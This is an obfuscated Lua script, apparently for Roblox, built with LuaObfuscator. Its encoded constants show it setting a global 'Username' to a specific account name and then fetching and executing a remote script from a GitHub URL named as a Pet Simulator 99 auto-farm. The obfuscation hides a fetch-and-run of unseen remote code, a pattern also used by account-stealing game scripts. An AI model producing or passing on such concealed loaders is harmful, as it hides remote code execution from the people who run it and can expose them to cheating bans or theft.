--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==1) then return v92;end if (v91==0) then v92=v5(v81,v19);v19=nil;v91=1;end end else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + (941 -(282 + 595)))))) ;return v82-(v82%(932 -(857 + 74))) ;else local v83=(570 -((2004 -(1523 + 114)) + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v83 + v83))>=v83) and (1 + 0 + 0)) or (0 + (0 -0)) ;end end local function v21()local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=(27 + 91) -(32 + 85) ;end if (v34==(1 + 0)) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v37 * (472 -216)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -(87 + 263)) ;return (v41 * ((12338973 + 4438423) -(67 + 113))) + (v40 * (48056 + 17480)) + (v39 * (628 -372)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=3 -2 ;local v45=(v20(v43,953 -(802 + 150) ,53 -33 ) * ((3 -1)^(24 + 8))) + v42 ;local v46=v20(v43,1018 -(915 + 82) ,87 -56 );local v47=((v20(v43,32)==(1 + 0)) and  -(1 -(0 -0))) or 1 ;if (v46==0) then if (v45==(442 -(416 + 26))) then return v47 * (1187 -(1069 + 118)) ;else v46=2 -1 ;v44=0 -0 ;end elseif (v46==(356 + 1691)) then return ((v45==0) and (v47 * ((1 -(0 -0))/(0 + 0)))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -(368 + 423)) ) * (v44 + (v45/((6 -4)^((31 + 39) -(10 + 8))))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(430 -(44 + 386))) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 -0) );v18=v18 + v48 ;local v50={};for v65=439 -(145 + 293) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==(283 -(99 + 181))) then v58=nil;while true do local v93=0 + 0 ;local v94;while true do if (v93~=(606 -(454 + 152))) then else v94=0 -0 ;while true do if (v94==1) then if (v52~=0) then else local v123=1288 -(993 + 295) ;local v124;while true do if (v123==(0 + 0)) then v124=0;while true do if (v124==1) then local v159=0;while true do if (1==v159) then v124=2;break;end if (v159~=(1171 -(418 + 753))) then else v55={};v56={v53,v54,nil,v55};v159=530 -(406 + 123) ;end end end if (v124~=(1769 -(1749 + 20))) then else local v160=0;while true do if (v160==0) then local v161=0;while true do if (v161~=1) then else v160=1 + 0 ;break;end if (v161~=(1322 -(1249 + 73))) then else v53={};v54={};v161=1 + 0 ;end end end if (v160==1) then v124=1146 -(466 + 679) ;break;end end end if (v124~=(4 -2)) then else v52=2 -1 ;break;end end break;end end end break;end if (v94~=0) then else local v99=0;local v100;while true do if (v99==(1900 -(106 + 1794))) then v100=0;while true do if (0~=v100) then else local v155=0;while true do if (1~=v155) then else v100=1 + 0 ;break;end if ((0 + 0)==v155) then if (v52==1) then local v162=0 -0 ;local v163;while true do if (0==v162) then v163=0 -0 ;while true do if (v163==1) then local v168=114 -(4 + 110) ;local v169;while true do if (v168~=0) then else v169=584 -(57 + 527) ;while true do if (0~=v169) then else local v171=0;while true do if (v171~=(1427 -(41 + 1386))) then else for v174=1,v57 do local v175=0;local v176;local v177;local v178;while true do if (v175==0) then v176=0;v177=nil;v175=104 -(17 + 86) ;end if (v175==(1 + 0)) then v178=nil;while true do if (v176==(1 -0)) then if (v177==(2 -1)) then v178=v21()~=0 ;elseif (v177==(168 -(122 + 44))) then v178=v24();elseif (v177==3) then v178=v25();end v58[v174]=v178;break;end if (v176==0) then local v188=0;while true do if (v188==0) then v177=v21();v178=nil;v188=1 -0 ;end if (v188==1) then v176=3 -2 ;break;end end end end break;end end end v56[3 + 0 ]=v21();v171=1 + 0 ;end if (v171==(1 -0)) then v169=66 -(30 + 35) ;break;end end end if (v169==1) then v163=2 + 0 ;break;end end break;end end end if (v163==0) then local v170=1257 -(1043 + 214) ;while true do if (1~=v170) then else v163=3 -2 ;break;end if (v170~=0) then else v57=v23();v58={};v170=1213 -(323 + 889) ;end end end if (v163~=(5 -3)) then else v52=2;break;end end break;end end end if (v52~=2) then else local v164=0;local v165;while true do if (v164~=(580 -(361 + 219))) then else v165=320 -(53 + 267) ;while true do local v166=0;local v167;while true do if ((0 + 0)~=v166) then else v167=413 -(15 + 398) ;while true do if (v167~=(982 -(18 + 964))) then else if (v165==1) then return v56;end if (v165==0) then local v172=0 -0 ;while true do if (v172~=0) then else for v179=1,v23() do local v180=0;local v181;local v182;local v183;while true do if (v180==(1 + 0)) then v183=nil;while true do if (v181==(0 + 0)) then local v189=850 -(20 + 830) ;while true do if (v189==1) then v181=1 + 0 ;break;end if (v189==0) then v182=126 -(116 + 10) ;v183=nil;v189=1 + 0 ;end end end if (v181==(739 -(542 + 196))) then while true do if (v182==(0 -0)) then v183=v21();if (v20(v183,1 + 0 ,1 + 0 )==(0 + 0)) then local v190=0;local v191;local v192;local v193;local v194;local v195;while true do if (v190==0) then v191=0;v192=nil;v190=1;end if (v190==(4 -2)) then v195=nil;while true do if (v191~=1) then else local v196=0;while true do if (v196==0) then v194=nil;v195=nil;v196=1;end if (v196~=(2 -1)) then else v191=2;break;end end end if (0~=v191) then else local v197=1551 -(1126 + 425) ;while true do if ((405 -(118 + 287))~=v197) then else v192=0 -0 ;v193=nil;v197=1;end if (v197==1) then v191=1122 -(118 + 1003) ;break;end end end if (2~=v191) then else while true do if (v192==3) then if (v20(v194,8 -5 ,380 -(142 + 235) )==1) then v195[18 -14 ]=v58[v195[4]];end v53[v179]=v195;break;end if (v192~=1) then else local v199=0;while true do if (v199~=1) then else v192=2;break;end if (v199~=(0 + 0)) then else v195={v22(),v22(),nil,nil};if (v193==(0 + 0)) then local v207=0 + 0 ;while true do if (v207==(0 + 0)) then v195[2 + 1 ]=v22();v195[4]=v22();break;end end elseif (v193==1) then v195[3]=v23();elseif (v193==2) then v195[3]=v23() -((2 + 0)^(34 -18)) ;elseif (v193~=(7 -4)) then else local v216=0;local v217;while true do if (v216==(0 -0)) then v217=0;while true do if ((0 + 0)==v217) then v195[14 -11 ]=v23() -(2^16) ;v195[4]=v22();break;end end break;end end end v199=1;end end end if ((753 -(239 + 514))==v192) then local v200=0;local v201;local v202;while true do if (0==v200) then v201=0;v202=nil;v200=1 + 0 ;end if (v200==(1330 -(797 + 532))) then while true do if (v201==0) then v202=0;while true do if (v202==1) then v192=1;break;end if (v202==(0 + 0)) then local v213=0;local v214;while true do if (v213==(0 + 0)) then v214=0;while true do if (v214==(2 -1)) then v202=1203 -(373 + 829) ;break;end if (v214~=(731 -(476 + 255))) then else local v222=1130 -(369 + 761) ;while true do if (v222==(0 + 0)) then v193=v20(v183,2,3);v194=v20(v183,4,10 -4 );v222=1 -0 ;end if (1==v222) then v214=239 -(64 + 174) ;break;end end end end break;end end end end break;end end break;end end end if ((1 + 1)==v192) then local v203=0 -0 ;local v204;while true do if (v203==(336 -(144 + 192))) then v204=216 -(42 + 174) ;while true do if ((1 + 0)==v204) then v192=3;break;end if (v204~=0) then else local v208=0 + 0 ;while true do if (v208==1) then v204=1 + 0 ;break;end if (v208~=0) then else local v215=1504 -(363 + 1141) ;while true do if (v215==1) then v208=1;break;end if (v215~=(1580 -(1183 + 397))) then else if (v20(v194,2 -1 ,1 + 0 )==(1 + 0)) then v195[2]=v58[v195[2]];end if (v20(v194,2,1977 -(1913 + 62) )==(1 + 0)) then v195[7 -4 ]=v58[v195[1936 -(565 + 1368) ]];end v215=1;end end end end end end break;end end end end break;end end break;end if (v190==1) then v193=nil;v194=nil;v190=7 -5 ;end end end break;end end break;end end break;end if (v180==(1661 -(1477 + 184))) then local v186=0;while true do if (v186==0) then v181=0 -0 ;v182=nil;v186=1 + 0 ;end if (v186==1) then v180=857 -(564 + 292) ;break;end end end end end for v184=1 -0 ,v23() do v54[v184-(2 -1) ]=v28();end v172=1;end if (v172==(305 -(244 + 60))) then v165=1;break;end end end break;end end break;end end end break;end end end v155=1 + 0 ;end end end if (v100~=1) then else v94=477 -(41 + 435) ;break;end end break;end end end end break;end end end break;end if (v51~=(1002 -(938 + 63))) then else local v87=0;while true do if (v87==(0 + 0)) then v54=nil;v55=nil;v87=1126 -(936 + 189) ;end if (v87==(1 + 0)) then v51=2;break;end end end if (v51==2) then local v88=1613 -(1565 + 48) ;local v89;while true do if ((0 + 0)==v88) then v89=1138 -(782 + 356) ;while true do if ((267 -(176 + 91))~=v89) then else v56=nil;v57=nil;v89=1;end if (v89~=(2 -1)) then else v51=3;break;end end break;end end end if (v51==(0 -0)) then local v90=1092 -(975 + 117) ;while true do if (v90==(1875 -(157 + 1718))) then v52=0 + 0 ;v53=nil;v90=1;end if (v90~=(3 -2)) then else v51=1;break;end end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v84=0,v75 do if (v84>=v69) then v73[v84-v69 ]=v74[v84 + 1 ];else v77[v84]=v74[v84 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=11) then if (v80<=5) then if (v80<=2) then if (v80<=0) then for v119=v79[2],v79[3] do v77[v119]=nil;end elseif (v80>1) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=3) then v77[v79[2]][v79[3]]=v79[4];elseif (v80>4) then do return;end else local v126=v79[2];v77[v126]=v77[v126](v13(v77,v126 + 1 ,v72));end elseif (v80<=8) then if (v80<=6) then v71=v79[3];elseif (v80==7) then v77[v79[2]]();else v77[v79[2]]=v79[3];end elseif (v80<=9) then local v104=v79[2];local v105=v77[v79[3]];v77[v104 + 1 ]=v105;v77[v104]=v105[v79[4]];elseif (v80==10) then local v130=0;local v131;local v132;local v133;local v134;while true do if (v130==2) then for v156=v131,v72 do v134=v134 + 1 ;v77[v156]=v132[v134];end break;end if (v130==0) then v131=v79[2];v132,v133=v70(v77[v131](v13(v77,v131 + 1 ,v79[3])));v130=1;end if (1==v130) then v72=(v133 + v131) -1 ;v134=0;v130=2;end end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=17) then if (v80<=14) then if (v80<=12) then local v109=v79[2];local v110,v111=v70(v77[v109](v13(v77,v109 + 1 ,v79[3])));v72=(v111 + v109) -1 ;local v112=0;for v121=v109,v72 do local v122=0;while true do if (v122==0) then v112=v112 + 1 ;v77[v121]=v110[v112];break;end end end elseif (v80>13) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=15) then local v113=v79[2];local v114=v77[v79[3]];v77[v113 + 1 ]=v114;v77[v113]=v114[v79[4]];elseif (v80>16) then local v137=v79[2];v77[v137]=v77[v137](v13(v77,v137 + 1 ,v72));else for v142=v79[2],v79[3] do v77[v142]=nil;end end elseif (v80<=20) then if (v80<=18) then v71=v79[3];elseif (v80>19) then do return;end else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=21) then v77[v79[2]]();elseif (v80>22) then v77[v79[2]]=v79[3];elseif ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v61;else v77[v79[2]]=v61[v79[3]];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!083O00028O0003023O005F4703083O00557365726E616D65030E3O00426C61636B6D2O6F6E3130323339030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50532O392F6D61696E2F50657453696D756C61746F722O394175746F4661726D2E6C756100163O0012173O00014O0010000100013O00260D3O0002000100010004123O00020001001217000100013O00260D00010005000100010004123O0005000100120E000200023O00300B00020003000400120E000200053O00120E000300063O00200F000300030007001217000500084O0013000600014O000C000300064O001100023O00022O00150002000100010004123O001500010004123O000500010004123O001500010004123O000200012O00143O00017O00",v9(),...);
